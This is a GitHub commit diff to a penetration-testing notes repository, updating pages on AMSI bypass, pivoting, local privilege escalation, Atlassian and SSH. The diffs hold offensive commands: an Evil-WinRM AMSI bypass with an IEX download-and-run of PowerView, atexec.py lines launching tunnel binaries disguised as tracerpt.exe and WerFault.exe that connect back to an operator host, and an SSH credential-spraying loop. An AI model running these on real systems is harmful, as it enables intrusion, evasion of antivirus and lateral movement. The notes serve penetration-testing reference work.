[AHK] Automatic update 👽

snovvcrash · Jul 19, 2023 · 6b9d3b4 · 6b9d3b4
1 parent fae1f22
commit 6b9d3b4
Show file tree

Hide file tree

Showing 6 changed files with 58 additions and 24 deletions.
diff --git a/SUMMARY.md b/SUMMARY.md
@@ -96,6 +96,7 @@
   - [DevOps](pentest/infrastructure/devops/README.md)
     * [Ansible](pentest/infrastructure/devops/ansible.md)
     * [Artifactory](pentest/infrastructure/devops/artifactory.md)
+    * [Atlassian](pentest/infrastructure/devops/atlassian.md)
     * [Containerization / Orchestration](pentest/infrastructure/devops/containerization-orchestration.md)
     * [GitLab](pentest/infrastructure/devops/gitlab.md)
     * [Jenkis](pentest/infrastructure/devops/jenkins.md)

diff --git a/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md b/pentest/infrastructure/ad/av-edr-evasion/amsi-bypass.md
@@ -13,10 +13,6 @@ description: Antimalware Scan Interface
 * [https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/](https://pentestlaboratories.com/2021/05/17/amsi-bypass-methods/)
 * [https://iwantmore.pizza/posts/amsi.html](https://iwantmore.pizza/posts/amsi.html)
 * [https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation](https://github.com/BC-SECURITY/Beginners-Guide-to-Obfuscation)
-* [https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/](https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/)
-* [https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch](https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch)
-* [https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/](https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/)
-* [https://github.com/ZeroMemoryEx/Amsi-Killer/blob/master/README.md](https://github.com/ZeroMemoryEx/Amsi-Killer/blob/master/README.md)
 
 AMSI Test [Sample](https://gist.github.com/rasta-mouse/5cdf25b7d3daca5536773fdf998f2f08):
 
@@ -27,17 +23,7 @@ PS > Invoke-Expression "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386"
 
 
 
-## PowerShell
-
-
-
-### Evil-WinRM + IEX
-
-```
-*Evil-WinRM* PS > menu
-*Evil-WinRM* PS > Bypass-4MSI
-*Evil-WinRM* PS > IEX([Net.Webclient]::new().DownloadString("http://127.0.0.1/PowerView.ps1"))
-```
+## Break the Logic
 
 
 
@@ -84,6 +70,15 @@ $A="5492868772801748688168747280728187173688878280688776";$B="828117368086765687
 
 
 
+
+## Memory Patching
+
+- [https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch](https://github.com/Mr-Un1k0d3r/AMSI-ETW-Patch)
+- [https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/](https://www.blazeinfosec.com/post/tearing-amsi-with-3-bytes/)
+- [https://github.com/ZeroMemoryEx/Amsi-Killer](https://github.com/ZeroMemoryEx/Amsi-Killer)
+
+
+
 ### Patch AmsiScanBuffer
 
 * [https://rastamouse.me/memory-patching-amsi-bypass/](https://rastamouse.me/memory-patching-amsi-bypass/)
@@ -276,7 +271,9 @@ foreach ($p in $providers) { Get-ItemProperty "HKLM:\SOFTWARE\Classes\CLSID\$p\I
 
 
 
-## Jscript
+## Registry & Filesystem
+
+{% embed url="https://twitter.com/eversinc33/status/1666121784192581633" %}
 
 
 
@@ -328,3 +325,21 @@ try {
 ...
 ```
 {% endcode %}
+
+
+
+
+## Hardware Breakpoints (Fileless Bypass)
+
+- [https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/](https://ethicalchaos.dev/2022/04/17/in-process-patchless-amsi-bypass/)
+- [https://gist.github.com/CCob/fe3b63d80890fafeca982f76c8a3efdf](https://gist.github.com/CCob/fe3b63d80890fafeca982f76c8a3efdf)
+- [https://gist.github.com/susMdT/360c64c842583f8732cc1c98a60bfd9e](https://gist.github.com/susMdT/360c64c842583f8732cc1c98a60bfd9e)
+
+
+
+
+## Hook NtCreateSection
+
+- [https://waawaa.github.io/es/amsi_bypass-hooking-NtCreateSection/](https://waawaa.github.io/es/amsi_bypass-hooking-NtCreateSection/)
+- [https://s3cur3th1ssh1t.github.io/Cat_Mouse_or_Chess/](https://s3cur3th1ssh1t.github.io/Cat_Mouse_or_Chess/)
+- [https://github.com/S3cur3Th1sSh1t/Ruy-Lopez](https://github.com/S3cur3Th1sSh1t/Ruy-Lopez)
diff --git a/pentest/infrastructure/devops/atlassian.md b/pentest/infrastructure/devops/atlassian.md
@@ -0,0 +1,8 @@
+# Atlassian
+
+
+
+
+## Jira
+
+- [https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting](https://github.com/UGF0aWVudF9aZXJv/Atlassian-Jira-pentesting)
diff --git a/pentest/infrastructure/lpe.md b/pentest/infrastructure/lpe.md
@@ -31,6 +31,7 @@ PS > Set-PSReadlineOption -HistorySaveStyle SaveNothing
 ```
 PS > whoami == dir env:
 PS > whoami /groups == ([System.Security.Principal.WindowsIdentity]("$env:USERNAME")).Groups | % { $_.Translate([Security.Principal.NTAccount]) } | select -ExpandProperty value
+PS > (New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
 ```
 
 

diff --git a/pentest/infrastructure/pivoting.md b/pentest/infrastructure/pivoting.md
@@ -379,9 +379,9 @@ alice@victim:~$ nohup ./chisel client [--fingerprint <BASE64_STRING>] [--auth sn
 Quicky:
 
 ```
-$ atexec.py -nooutput megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"'
+$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\tracerpt.exe server -p 8000 --socks5 --auth snovvcrash:"Passw0rd!"'
 $ sudo chisel client -v --auth snovvcrash:'Passw0rd!' 192.168.1.11:8000 127.0.0.1:1080:socks
-$ atexec.py -nooutput megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe'
+$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:tracerpt.exe /F && del C:\Windows\tracerpt.exe'
 ```
 
 
@@ -425,15 +425,16 @@ alice@victim:~$ ./revsocks -connect 10.14.14.3:8000 -pass 'Passw0rd!'
 
 - [https://github.com/llkat/rsockstun](https://github.com/llkat/rsockstun)
 
-{% content-ref url="/redteam/maldev/golang.md#garble" %}
-[golang.md](golang.md)
-{% endcontent-ref %}
-
 ```
 $ openssl req -new -x509 -keyout cert.key -out cert.crt -days 365 -nodes
 $ sudo rsockstun -listen :8000 -socks 127.0.0.1:1080 -cert cert -pass 'Passw0rd!'
-$ atexec.py -nooutput megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"'
-$ atexec.py -nooutput megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe'
+```
+
+Quicky:
+
+```
+$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'start "" /b C:\Windows\WerFault.exe -connect 10.10.13.37:8000 -pass "Passw0rd!"'
+$ atexec.py megacorp.local/snovvcrash@192.168.1.11 'taskkill /IM:WerFault.exe /F && del C:\Windows\WerFault.exe'
 ```
 
 

diff --git a/pentest/perimeter/ssh.md b/pentest/perimeter/ssh.md
@@ -11,6 +11,14 @@ description: Secure Shell
 
 - [https://github.com/mcorybillington/sshspray](https://github.com/mcorybillington/sshspray)
 
+A list of targets with different SSH ports:
+
+```
+$ das parse ssh -raw | cut -c 7- | awk -F: '{print $1}' > ssh_hosts
+$ das parse ssh -raw | cut -c 7- | awk -F: '{print $2}' > ssh_ports
+$ paste ssh_hosts ssh_ports | while read host port; do cme ssh $host -u root -p root --port $port; done
+```
+
 Password spray with a private key and passphrase `Passw0rd!` using CME:
 
 ```